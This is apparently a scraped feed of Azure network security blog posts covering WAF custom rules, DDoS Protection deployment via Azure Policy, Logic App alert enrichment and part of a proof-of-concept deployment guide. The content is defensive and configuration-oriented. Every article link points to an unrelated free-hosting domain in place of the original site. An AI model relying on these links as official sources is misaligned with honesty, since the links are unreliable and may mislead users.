Azure WAF Attack Testing 
Lab</A>&nbsp;</H4> <H4>&nbsp;</H4> <H4>&nbsp;</H4> <P>&nbsp;</P> <P>&nbsp;</P> Fri, 15 Jan 2021 02:07:38 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/tutorial-overview-azure-web-application-firewall-security/ba-p/2030423 Mohit_Kumar 2021-01-15T02:07:38Z Azure WAF Custom Rule Samples and Use Cases https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/azure-waf-custom-rule-samples-and-use-cases/ba-p/2033020 <P>Written in collaboration with&nbsp;<LI-USER uid="629915"></LI-USER>&nbsp;</P> <P>&nbsp;</P> <P>This post will detail how to use Custom Rules on Azure WAF, including some examples of common use cases fulfilled by this rule type. Custom Rules provide a versatile way to build controls that fulfill security requirements and protect applications from attacks that are unique to your applications.</P> <P>&nbsp;</P> <H2>WAF Rule Types and Processing</H2> <P>Azure WAF currently offers 3 rule types, which are processed in the following order:</P> <OL> <LI>Custom Rules – custom rules are processed first, and function according to the logic you select. This makes them very powerful as the first line of defense for web applications.</LI> <LI>Managed OWASP Rules – OWASP rulesets are based on the <A href="#" target="_blank" rel="noopener">SpiderLabs Core Ruleset (CRS)</A>, and can detect common web attacks like SQL injection, cross-site scripting, and command injection. These rules cannot be modified, but the ruleset can be tuned by using exclusions and by modifying rule actions (a topic for another post).</LI> <LI>Managed Bot Rules – these rules identify potential bot activity by matching sources against our internal Threat Intelligence feeds. If traffic is coming from a known source of bot activity, the traffic can be blocked.</LI> </OL> <P>This post focuses on Custom Rules, but it is important to understand how the managed rulesets work. 
For more information on these, look for future blog posts here or consult the <A href="#" target="_blank" rel="noopener">Azure WAF documentation</A>.</P> <P>&nbsp;</P> <H2>Important Custom Rule Concepts</H2> <P>Custom Rules can be viewed and built using the Azure Portal by navigating to Web Application Firewall Policies (WAF), selecting your policy, and clicking on the Custom Rules blade. Creating a custom rule is as simple as clicking Add Custom Rule and entering a few required fields. However, there are some important concepts to understand before you create your own rules.</P> <P>&nbsp;</P> <P>The most important thing to mention about Custom Rules is that they are terminating. This means that if the logic of the rule is matched, all other rules stop processing,&nbsp;including the lower priority (higher number) Custom Rules, and both OWASP and Bot managed rulesets. This is the case regardless of the action of the rule; even if traffic is allowed, no further rules are processed. This can have positive or negative implications.</P> <P>&nbsp;</P> <P>The Allow action should be used sparingly in Custom Rules, because the rule terminates and all other inspection provided by WAF is skipped. Understanding this, you can use Allow rules when the intent is to skip the other checks, such as in tuning situations. If certain requests tend to trigger false positives, you can use a Custom Rule to allow the traffic at a more granular level than would be possible by using exclusions or disabling rules.</P> <P>&nbsp;</P> <P>In most scenarios, it is best to use Custom Rules with the Deny action, as a terminating Deny rule is entirely expected and without unanticipated consequences. 
For instance, if you wanted to use a WAF Custom Rule to create an IP Address allow list, it is better to Deny traffic that is not from the IP addresses in the list rather than Allow traffic from those IPs.&nbsp;Using the Deny action avoids causing traffic allowed by this rule to bypass the OWASP and Bot rulesets.</P> <P>&nbsp;</P> <P>Another concept to make use of in constructing effective Custom Rules is compound conditions. Rules can be created with a single condition, or you can add multiple conditions that must be satisfied to constitute a match. When adding multiple conditions, they are added as an AND statement, so all conditions must be met for the Action to take place. If you need to construct a rule with OR logic, it is best to create multiple rules with the same Action.</P> <P>&nbsp;</P> <H2>Custom Rule Example Templates and Use Cases</H2> <P>We have created <A href="#" target="_blank" rel="noopener">2 ARM templates</A>, which will create both WAF Policy types, one for WAF on Application Gateway and one for WAF on Front Door. These policies are intended to give you a starting point for creating your own Custom Rules. To deploy, simply click the Deploy to Azure buttons from the repository, select a Resource Group, and create your policies.</P> <P>&nbsp;</P> <P>These example policies must be modified to fit your requirements before associating with any Front Door or Application Gateway resources, and the following sections will provide guidance on how to do so.</P> <P>&nbsp;</P> <H3>Block Lists</H3> <P>Some customers have the requirement to block certain sources of traffic based on IP address or country of origin. In these scenarios, block lists can be used, which you must create and keep up to date. The examples included in the templates are GeoBlockList and IPBlockList. The behavior of these basic rules can be modified to add conditions if necessary. 
For example, you may want to block a certain part of a site from a geographic region, as pictured:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Anthony_Roman_1-1609857161165.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244290i21C9059CE59E2030/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_1-1609857161165.png" alt="Anthony_Roman_1-1609857161165.png" /></span></P> <P>&nbsp;</P> <P>Notice that there is a second condition in the "And if" box, which defines a specific request URI. This additional condition creates an AND expression, meaning that both the first condition about geolocation and the second condition about the request URI must be matched in order for the Deny action to trigger.</P> <P>&nbsp;</P> <P>These block lists can be added manually via the Portal or managed programmatically using ARM, API, or CLI. One example of <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/integrating-azure-web-application-firewall-with-azure-sentinel/ba-p/1720306" target="_blank" rel="noopener">adding to a block list automatically using Azure Sentinel Playbooks</A> can be found in a previous post.</P> <P>&nbsp;</P> <H3>Allow Lists</H3> <P>IP address or geographic restrictions can be accomplished effectively using allow lists. 
This method is preferable if you only do business in certain countries, or if you have an internal website you would like to be available only to trusted IP addresses, such as corporate IP blocks.</P> <P>&nbsp;</P> <P>The following example shows the IPAllowList rule found in the template:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Anthony_Roman_2-1609857161169.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244292i2A84F072EB53FE6B/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_2-1609857161169.png" alt="Anthony_Roman_2-1609857161169.png" /></span></P> <P>&nbsp;</P> <P>Notice that the allow list uses the "Does not contain" operator. This allows our logic to use the Deny action to block only the traffic that does not originate from the trusted range. This means that the trusted IP addresses or ranges will continue to be inspected by the other applicable WAF rules. Using this approach, we can avoid creating a rule using the "Does contain" operation along with the Allow action, which would result in a rule termination scenario that would exempt the trusted traffic from further WAF inspection.</P> <P>&nbsp;</P> <H3>Controlling Allowed HTTP Methods</H3> <P>HTTP method enforcement can be done in a dynamic way using WAF Custom Rules. Consider the scenario where you have an API that should be available publicly for customers to GET and POST, but you want to reserve PUT and DELETE actions for traffic originating from trusted locations as an extra layer of security beyond authentication. 
The following modification of the MethodAllowList rule can be used to accomplish this.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Anthony_Roman_3-1609857161178.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244291iE66A797EC04943E8/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_3-1609857161178.png" alt="Anthony_Roman_3-1609857161178.png" /></span></P> <P>&nbsp;</P> <H3>Blocking User Agents</H3> <P>Some of the OWASP managed rules will detect well known malicious user agents, but if you find the need to block a specific set, a Custom Rule is a way to accomplish this. Of course, user agent is not a difficult element for an attacker to change, but this type of rule can help deflect unsophisticated attackers. The logic of the UserAgentBlock rule is represented in the template pictured below.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Anthony_Roman_4-1609857161181.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244293i3D88C4164179CCA7/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_4-1609857161181.png" alt="Anthony_Roman_4-1609857161181.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <H3>Rate Limiting with WAF for Front Door</H3> <P>WAF on Azure Front Door has the added capability of Custom Rules with a Rate Limit type, as distinct from Match type rules. Rate Limit rules will keep track of the number of requests from a particular IP address and block requests made after a threshold is reached.</P> <P>&nbsp;</P> <P>These rules can be part of an effective layer 7 DDoS protection strategy. Azure DDoS Protection, both at the platform level (free) and using the Standard tier (paid) will protect against high volume attacks, but there are application attacks that do not necessarily rely on high volume. 
Some of these attacks can be mitigated by using source rate limiting in Custom Rules. The idea is that a legitimate user of a site will make a predictable number of requests to the site over a given time period, but an attacker trying to disrupt the site’s availability would likely make more requests. A threshold can be set to limit the volume of traffic to a particular path from a source, as pictured below.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Anthony_Roman_5-1609857161185.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244295iB9B0B137E4FDACDC/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_5-1609857161185.png" alt="Anthony_Roman_5-1609857161185.png" /></span></P> <P>&nbsp;</P> <P>In the above rate limiting rule, 100 requests from the same IP address would be allowed within any 1 minute time period, but after the threshold is met, additional requests from that IP would be dropped for 1 minute. After the rate limiting period expires, traffic is allowed and the counter to 100 starts again.</P> <P>&nbsp;</P> <H3>Using WAF on Application Gateway to only Allow Traffic from your Front Door</H3> <P>A common architectural design is to use Azure Front Door to provide global load balancing and content distribution in front of Application Gateways hosted in 2 or more regions. NSGs can be used on the Application Gateway subnet to only allow traffic from the Front Door service, but the remaining security concern here is that Front Door is a shared service. 
You probably want to allow traffic only from your Front Door service specifically to prevent an attacker from setting up a “rogue” Front Door instance without WAF in order to circumvent inspection.</P> <P>&nbsp;</P> <P>Fortunately, Front Door adds a header (X-Azure-FDID) to all traffic it processes, which identifies it as your instance of Front Door.&nbsp;Pictured below is a WAF Custom Rule, AllowFrontDoor in the template, that will only allow traffic that contains this specific header value. This guarantees that traffic sourcing from unapproved Front Door instances will not connect to your service.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Anthony_Roman_6-1609857161187.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244294i71E36D89C852F09E/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_6-1609857161187.png" alt="Anthony_Roman_6-1609857161187.png" /></span></P> <P>&nbsp;</P> <H2>Summary</H2> <P>The preceding example use cases are not very complex in nature, yet they provide considerable results to improve the security of your applications. We hope these samples help you understand how flexible Custom Rules can be, and that you can use this as a starting point to build more advanced rule logic in your environment. There are many possibilities to add complexity and effectiveness to these examples, including using Regex to look for patterns in the request body. 
If you come up with any particularly useful rules, please feel free to share in the comments here or add a sample to our <A href="#" target="_blank" rel="noopener">GitHub repository</A>.</P> <P>&nbsp;</P> Fri, 15 Jan 2021 14:15:26 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/azure-waf-custom-rule-samples-and-use-cases/ba-p/2033020 Anthony_Roman 2021-01-15T14:15:26Z Deploying DDoS Protection Standard with Azure Policy https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/deploying-ddos-protection-standard-with-azure-policy/ba-p/1942133 <P>One of the most important questions customers ask when deploying Azure DDoS Protection Standard for the first time is how to manage the deployment at scale. A DDoS Protection Plan represents an investment in protecting the availability of resources, and this investment must be applied intentionally across an Azure environment.</P> <P>&nbsp;</P> <P><A href="#" target="_blank" rel="noopener">Creating a DDoS Protection Plan</A> and associating a few virtual networks using the Azure portal takes a single administrator just minutes, making it one of the easiest to deploy resources in Azure. However, in larger environments this can be a more difficult task, especially when it comes to managing the deployment as network assets multiply.</P> <P>&nbsp;</P> <P>Azure DDoS Protection Standard is deployed by creating a DDoS Protection Plan and associating VNets to that plan. The VNets can be in any subscription in the same tenant as the plan. While the deployment is done at the VNet level, the protection and the billing are both based on the public IP address resources associated to the VNets. 
For instance, if an Application Gateway is deployed in a certain VNet, its public IP becomes a protected resource, even though the virtual network itself only directly contains private addresses.</P> <P>&nbsp;</P> <P>A consideration worth making is that the cost is not insignificant – a DDoS Protection plan starts at $3,000 USD per month for up to 100 protected IPs, adding $30 per public IP beyond 100. When the commitment has been made to investing in this protection, it is very important for you to be able to ensure that investment is applied across all required assets.</P> <P>&nbsp;</P> <H2>Azure Policy to Audit and Deploy</H2> <P>We just posted an <A href="#" target="_blank" rel="noopener">Azure Policy sample to the Azure network security GitHub repository</A> that will audit whether a DDoS Protection Plan is associated to VNets, then optionally create a remediation task that will create the association to protect the VNet.</P> <P>&nbsp;</P> <P>The logic of the policy can be seen in the screenshot below. All virtual networks in the assignment scope are evaluated against the criteria of whether DDoS Protection is enabled and has a plan attached:</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Anthony_Roman_1-1606769233463.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/236710iD0900F6DA8E5168F/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_1-1606769233463.png" alt="Anthony_Roman_1-1606769233463.png" /></span></P> <P>&nbsp;</P> <P>Further down in the definition, there is a template that creates the association of the DDoS Protection Plan to the VNets in scope. 
Let’s look at what it takes to use this sample in a real environment.</P> <P>&nbsp;</P> <H2>Creating a Definition</H2> <P>To create an Azure Policy Definition:</P> <P>&nbsp;</P> <OL> <LI>Navigate to Azure Policy --&gt; Definitions and select '+ Policy Definition.'</LI> <LI>For the Definition Location field, select a subscription. This policy will still be able to be assigned to other subscriptions via Management Groups.</LI> <LI>Define an appropriate Name, Description, and Category for the Policy.</LI> <LI>In the Policy Rule box, replace the example text with the contents of <A href="#" target="_blank" rel="noopener">VNet-EnableDDoS.json</A></LI> <LI>Save.</LI> </OL> <P>&nbsp;</P> <H2>Assigning the Definition</H2> <P>Once the Policy Definition has been created, it must be assigned to a scope. This gives you the ability to either deploy the policy to everything, using either Management Group or Subscription as the scope, or select which resources get DDoS Protection Standard protection based on Resource Group.</P> <P>To assign the definition:</P> <P>&nbsp;</P> <OL> <LI>From the Policy Definition, click Assign.</LI> <LI>On the Basics tab, choose a scope and exclude resources if necessary.</LI> <LI>On the Parameters tab, choose the Effect (DeployIfNotExists if you want to remediate) and paste in the Resource ID of the DDoS Protection Plan in the tenant:<BR /><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Anthony_Roman_2-1606769233474.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/236711i95362FCCFB0B6E73/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_2-1606769233474.png" alt="Anthony_Roman_2-1606769233474.png" /></span> <P>&nbsp;</P> </LI> <LI>On the Remediation tab, check the box to create a remediation task and choose a location for the managed identity to be created. 
Network Contributor is an appropriate role:<BR /><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Anthony_Roman_3-1606769233502.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/236712iCBBA91BDE35F67A0/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_3-1606769233502.png" alt="Anthony_Roman_3-1606769233502.png" /></span> <P>&nbsp;</P> </LI> <LI>Create.</LI> </OL> <P>&nbsp;</P> <H2>Modifying the Policy Definition</H2> <P>The process outlined above can be used to apply DDoS Protection to collections of resources as defined by the boundaries of management groups, subscriptions, and resource groups. However, these boundaries do not always represent an exhaustive list of where DDoS Protection should or should not be applied. Sure, some customers want to attach a DDoS Protection Plan to every VNet, but most will want to be more selective.</P> <P>&nbsp;</P> <P>Even if resource groups are granular enough to determine whether DDoS Protection should be applied, Policy Assignments are limited to a single RG per assignment, so the process of creating an assignment for every resource group is prohibitively tedious.</P> <P>&nbsp;</P> <P>One solution to the problem of policy scoping is to modify the definition rather than the assignment. Let’s use the example of an environment where DDoS Protection is required for all production resources. Production environments could exist in many different subscriptions and resource groups, and this could change as new environments are stood up.</P> <P>&nbsp;</P> <P>The solution here is to use tags as the identifier of production resources. In order to use this as a way to scope Azure Policy Assignments, you must modify the definition. 
To do this, a short snippet needs to be added to the policy rule, along with corresponding parameters (or copied from <A href="#" target="_blank" rel="noopener">VNet-EnableDDoS-Tags.json)</A></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Anthony_Roman_4-1606769233505.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/236713i01E0C1162CAE0978/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_4-1606769233505.png" alt="Anthony_Roman_4-1606769233505.png" /></span></P> <P>&nbsp;</P> <P>After modifying a definition to look for tag values, the corresponding assignment will look slightly different:</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Anthony_Roman_0-1606769789031.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/236717i960DD2BD11A81E48/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_0-1606769789031.png" alt="Anthony_Roman_0-1606769789031.png" /></span></P> <P>&nbsp;</P> <P>In this configuration, a single Policy Definition can be assigned to a wide scope, such as a Management Group, and every tagged resource within will be in scope.</P> <P>&nbsp;</P> <H2>Verifying Compliance</H2> <P>When a Policy Assignment is created using a remediation action, the effect of the policy should guarantee compliance with requirements. 
To gain visibility into the auditing and remediation done by the policy, you can go to Azure Policy --&gt; Compliance and select the assignment to monitor:</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Anthony_Roman_6-1606769233518.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/236715i625202C80B4C924E/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_6-1606769233518.png" alt="Anthony_Roman_6-1606769233518.png" /></span></P> <P>&nbsp;</P> <P>A successful remediation task denotes that the VNet is now protected by Azure DDoS Protection Standard.</P> <P>&nbsp;</P> <H2>End-to-End Management with Azure Policy</H2> <P>Moving beyond plan association to VNets, there are some other requirements of DDoS Protection that Azure Policy can help with.</P> <P>&nbsp;</P> <P>On the Azure network security GitHub repo, you can find a <A href="#" target="_blank" rel="noopener">policy to restrict creation of more than one DDoS Protection Plan per tenant</A>, which helps to ensure that those with access cannot inadvertently drive up costs.</P> <P>&nbsp;</P> <P>Another sample is available to <A href="#" target="_blank" rel="noopener">keep diagnostic logs enabled across all Public IP Addresses</A>, which keeps valuable data flowing to the teams that care about such data.</P> <P>&nbsp;</P> <P>The point that should be taken from this post is that Azure Policy is a great mechanism to audit and enforce compliance with DDoS Protection requirements, and it has the power to control most other aspects of Azure security and compliance.</P> <P>&nbsp;</P> Tue, 09 Feb 2021 17:51:22 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/deploying-ddos-protection-standard-with-azure-policy/ba-p/1942133 Anthony_Roman 2021-02-09T17:51:22Z Enriching DDoS Protection Alerts with Logic Apps 
https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/enriching-ddos-protection-alerts-with-logic-apps/ba-p/1928000 <P><A href="#" target="_blank" rel="noopener">An ARM template recently posted to the Azure network security GitHub</A> repository has been created to deploy all components necessary for a detailed DDoS Protection alert that gets sent to the resource owner in addition to the security team, and even performs a basic availability check against the resource under attack. This post will explain why and how it all works.</P> <P>&nbsp;</P> <P>When Azure DDoS Protection Standard is enabled, the expectation is that any potential attack will be mitigated, and no additional response will be needed. However, as with any security control, security teams often require visibility into the process of DDoS mitigation. For this reason, it is highly recommended that you <A href="#" target="_blank" rel="noopener">enable diagnostic logging for Public IP Address resources</A> to ensure valuable data is generated.</P> <P>&nbsp;</P> <P>In the event of an ongoing attack, security teams have access to <A href="#" target="_blank" rel="noopener">DDoS Mitigation flow logs</A><SPAN>,</SPAN> which record all traffic observed during a mitigation event, including whether it was allowed or dropped, the drop reason if applicable, and the source IP address. All this data allows teams to investigate the sources, tactics, and techniques of an attack, even if the actual mitigation is handled by Azure. In the event that support is needed during an attack, DDoS Protection Standard allows access to <A href="#" target="_blank" rel="noopener">Rapid Response support</A>.</P> <P>&nbsp;</P> <P>Since many security teams are concerned with alert fatigue and false positives, and generally do not want to spend time investigating low priority alerts, it is important for these alerts to be truly actionable. 
We have received requests from customers to allow the owners of the resources being attacked to help determine whether intervention is required by the security team.</P> <P>&nbsp;</P> <H2>Azure Monitor Alert</H2> <P>The first stage in the process is to detect the DDoS attack, which is done here by an Azure Monitor alert rule. This can also be done using Azure Security Center or Azure Sentinel, and our plan is to create samples of the same logic described in this post for both Sentinel and Security Center (look for more upcoming blog posts).</P> <P>&nbsp;</P> <P>The query defined in the alert rule uses the DDoSProtectionNotifications category in the AzureDiagnostics table, which is written to as part of the diagnostic settings of Public IP Addresses. This event is the first data written when a DDoS mitigation event starts, so it is the perfect event to use for an alert.</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="sql">AzureDiagnostics
| where Category == "DDoSProtectionNotifications"
| where type_s == "MitigationStarted"
| project ResourceId, SubscriptionId, Message, publicIpAddress_s</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>By default, the rule runs every 5 minutes, but the template or alert can be edited if you have different requirements. Notice that the query projects 4 fields; those will be very important for the Logic App to use.</P> <P>&nbsp;</P> <P>An action group is also created by the template and attached to the alert rule. The action group consists of only a webhook action, which is pre-populated by the webhook address of the Logic App trigger. If other actions are needed, such as direct email or SMS, those can be added later.</P> <P>&nbsp;</P> <H2>Logic App Alert Enrichment</H2> <P>The Logic App deployed by the ARM template is triggered by a webhook request, which is expected to pass Azure Monitor alert data using the default schema. 
The fields projected by the alert query will be reused by the Logic App.</P> <P>&nbsp;</P> <P>The raw JSON sent to the webhook looks like the following, with the projected query results contained in a row object at the bottom:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Anthony_Roman_1-1606241256562.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/235788i9E282AEAF47C3BC0/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_1-1606241256562.png" alt="Anthony_Roman_1-1606241256562.png" /></span></P> <P>&nbsp;</P> <P>After receiving the webhook request, the first step of the Logic App is to query the Azure Resource Graph API using fields parsed from the alert JSON. The basis of the query being run is <A href="#" target="_blank" rel="noopener">one that can be found on our GitHub repo</A>. The query will return more information about the resource behind the Public IP Address, which is information not readily available in the standard diagnostic logs or even Security Center. For example, a public IP address can be associated with Application Gateways, Load Balancers, VMs, or Network Virtual Appliances (NVAs).</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Anthony_Roman_2-1606241256583.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/235789iFA2CABDA96EB1BFC/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_2-1606241256583.png" alt="Anthony_Roman_2-1606241256583.png" /></span></P> <P>&nbsp;</P> <P>In addition to the resource type and name, an important piece of metadata returned by the query is tag information. Specifically, the owner tag is parsed to determine who to notify in the event of an attack against the IP address. 
If it is not standard policy to populate this tag in your environment, there are Azure Policies available to do this automatically. Alternatively, the Logic App can be edited to use some other tag to determine the recipient of the alert.</P> <P>&nbsp;</P> <P>DDoS attacks commonly target web applications as the most visible and valuable assets, but other publicly facing resources can and do get attacked. The Logic App will initiate a test, a simple HTTP GET on port 80, against the IP address being attacked. This is of course making an assumption that there is a web application running behind the IP address and listening on port 80. This assumption is meant to provide extra information about the status of the asset under attack, which will be surfaced in the alert.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Anthony_Roman_3-1606241256586.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/235787i59A317BB7B0DAA47/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_3-1606241256586.png" alt="Anthony_Roman_3-1606241256586.png" /></span></P> <P>&nbsp;</P> <P>Based on both the query results and the results of the HTTP request, an email alert is finally sent to both the security team, as identified in the ARM template parameters, and the owner of the attacked resource.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Anthony_Roman_4-1606241256609.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/235790iF8D18432062D249F/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_4-1606241256609.png" alt="Anthony_Roman_4-1606241256609.png" /></span></P> <P>&nbsp;</P> <P>In the example email, actionable information is provided about the resource being attacked, including the status of the HTTP test. 
In this case, the resource associated to the Public IP Address is an Application Gateway, and the availability test returned a 502 Bad Gateway, which can indicate that the backend resources are unavailable. If this is the case, both the resource owner and the security team can work together to respond with the help of Microsoft Support.</P> <P>&nbsp;</P> <P>When deployed in your environment, the ARM template for enriched alerting will provide an excellent starting point for you to customize to the needs of your environment and response procedures.</P> Tue, 09 Feb 2021 17:54:52 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/enriching-ddos-protection-alerts-with-logic-apps/ba-p/1928000 Anthony_Roman 2021-02-09T17:54:52Z Azure Network Security Proof of Concept Part 2: Deploying the environment https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/azure-network-security-proof-of-concept-part-2-deploying-the/ba-p/1773168 <P>&nbsp;</P> <P>In the <EM>Planning to perform Proof of Concept guide&nbsp;<A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/azure-network-security-proof-of-concept-part-1-planning/ba-p/1746368" target="_self">Part 1</A>&nbsp;, </EM>we discussed the necessary steps for a successful POC such as : Understanding network security requirements for the different resources, creating indices to measure successful security POC, the security standards to be reviewed, how to create timelines to work on security lapses and how to monitor the network for improvement<EM>.</EM></P> <P>&nbsp;</P> <P>In this second part, you will learn to deploy and verify the environment to validate some of the sample Proof of Concept mentioned earlier. 
If you know the elements required already, you can go straight to the components (WAF, Azure Firewall or DDOS) in the sections below.</P> <P>&nbsp;</P> <H3>Permissions</H3> <P>To provision and configure resources, it is necessary to have Network Contributor access or a more permissive/<EM>administrator </EM>role.</P> <P>&nbsp;</P> <P>&nbsp;</P> <H2><SPAN>Azure Network Security Demo Environment</SPAN></H2> <P>&nbsp;</P> <P>An Azure pre-configured test deployment kit for POC is available in <A href="#" target="_blank" rel="noopener">this repository</A>. By agreeing to the terms, you can use this environment for most of the POC in this guide e.g. DDOS protection, OWASP top ten core rule set, Virtual network security etc. This environment has been configured to have most of the tools you would need and they have been connected by network rules that you can verify.</P> <P>&nbsp;</P> <P>(<STRONG>Note</STRONG>: <EM>Resources in this deployment will incur some charges. Make sure to remove resources once POC is completed</EM>)</P> <P>&nbsp;</P> <P>&nbsp;</P> <H2><FONT color="#333399"><STRONG>Deployment</STRONG></FONT></H2> <P>&nbsp;</P> <P>For <STRONG>portal</STRONG> deployment, Click on the Deploy button below to go to the deployment page.</P> <P class="lia-indent-padding-left-330px"><A href="#" target="_blank" rel="noopener"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="deply-to-azure.png" style="width: 200px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/226730i904DED280C74BD1B/image-size/small?v=v2&amp;px=200" role="button" title="deply-to-azure.png" alt="deply-to-azure.png" /></span></A></P> <UL> <LI>Create or use an existing <EM>resource group</EM>/region for the deployment.</LI> <LI>Provide <STRONG><EM>username</EM></STRONG>/<STRONG><EM>password </EM></STRONG>for access to the VMs.</LI> <LI>If you have <STRONG><EM>a Workspace Name</EM></STRONG> and <STRONG><EM>Workspace Subscription</EM></STRONG> for 
diagnostics log, insert it here. This is required for log access. If you do not have one, you can set it up <A href="#" target="_blank" rel="noopener">here</A>. This is highly recommended for all Azure resources.</LI> <LI>Click<STRONG> Create </STRONG>or <STRONG>Purchase </STRONG>to begin deployment.</LI> </UL> <P>&nbsp;</P> <P>To deploy the demo environment using <STRONG>PowerShell</STRONG>, follow these steps :</P> <P>&nbsp;</P> <P>Connect to your Azure environment</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="applescript">PS C:\windows\system32&gt; Connect-AzAccount</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P><STRONG>&nbsp;</STRONG>Create a <STRONG>resource group</STRONG> in your region</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="applescript">PS C:\windows\system32&gt; New-AzResourceGroup -Name demoresourcegroup -location "westus"</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>Deploy the demo environment using the template in the <A href="#" target="_blank" rel="noopener">GitHub repository</A></P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="applescript">PS C:\windows\system32&gt; New-AzResourceGroupDeployment -ResourceGroupName "demoresourcegroup" -TemplateUri https://raw.githubusercontent.com/Azure/Azure-Network-Security/master/Cross%20Product/Network%20Security%20Lab%20Template/AzNetSecdeploy.json -DiagnosticsWorkspaceName "TestWorkspace" -DiagnosticsWorkspaceSubscription "123456789-xxxx-xxxx-xxxx-b826eef6c592" -DiagnosticsWorkspaceResourceGroup "TestResourceGroup" -DDOSProtectionConfiguration $true</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>The following values in the last step should be updated for your account: <EM>Subscription ID</EM>, <EM>Log Analytics Workspace name</EM> and <EM>Resource Group</EM> for Log Analytics workspace.</P> <P>&nbsp;</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-120px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="deploymentps.png" 
